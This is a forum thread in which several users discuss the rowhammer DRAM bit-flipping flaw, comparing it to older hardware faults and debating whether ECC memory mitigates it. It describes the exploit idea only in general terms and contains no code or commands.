New exploit technique "hammering" on RAM to read OOB addresses

[barythrin]

Sort of an interesting issue. Seems like an archaic method that I wonder how far back this would go as it's a somewhat disappointing but simple bug in memory design. Perpaps limited only by older chipsets having a larger size and spacing between transistors.

Explaination of "rowhammer bug". Effectively they're affecting memory next to the address they're reading by continuously probing a row of memory and eventually affecting the row next to it (via ESD if I'm understanding correctly). Eventually they can change the boundary their program is allowed to address and therefore read restricted addresses or try and interject data to other addresses.

 

[Chuck(G)]

Reminds me of the problem with the CDC 7600 PPUs--a jump-to-self could cause core failure due to overheating. Nice to see that banging on DRAM also suffers from issues.

The fix for the 7600, IIRC, was euphemistically called something like "duty cycle integrator". Basically, it slowed down memory access when a location was pounded over and over again.

 

[mbbrutman]

There are flaws in the designs of computer hardware. And a lot of times things just boil down to physics. In this case, on consumer grade memory subsystems it is possible to induce single bit errors in unrelated memory cells by repeatedly hammering (writing) to a particular part of the memory. Hard drives have a similar problem; writing repeatedly to one track over and over again can damage the adjacent tracks. This is not a new problem - all modern hard drive firmware has detection and mitigation for this.

In the case of memory, trying to "code" an exploit by hoping that you can flip one bit at a time is probably not going to work. However, if you can fill memory with malicious code and then get a permission bit flipped somewhere, then you can get that code executed. So you don't need to construct the malicious code one bit at a time; you just need to trick the machine into running it. And if you have ever looked at OS data structures, there is lots of opportunity for a single bit flip to make the difference between a privileged or unprivileged operation.

 

[krebizfan]

Rowhammer does not seem to work on systems with ECC memory. I hope this finally puts an end to the tiny cost saving of non-ECC memory.

 

[Chuck(G)]

Rowhammer does not seem to work on systems with ECC memory. I hope this finally puts an end to the tiny cost saving of non-ECC memory.

That had me wondering also--surely, if a bit is flipped, error checking hardware (ECC or parity) would throw an exception. I guess that even simple parity on some memory is a thing of the past, now? That's just plain foolish, if true.

 

[cr1901]

http://googleprojectzero.blogspot.ch/2015/03/exploiting-dram-rowhammer-bug-to-gain.html

I hate everything... modern code is 95% fixing security holes.

A few months ago, I wouldn't have said this, but I'm starting to believe that everything from hardware to software is too complicated as to be maintainable. Something's gonna give- a paradigm shift in how we write code or create hardware.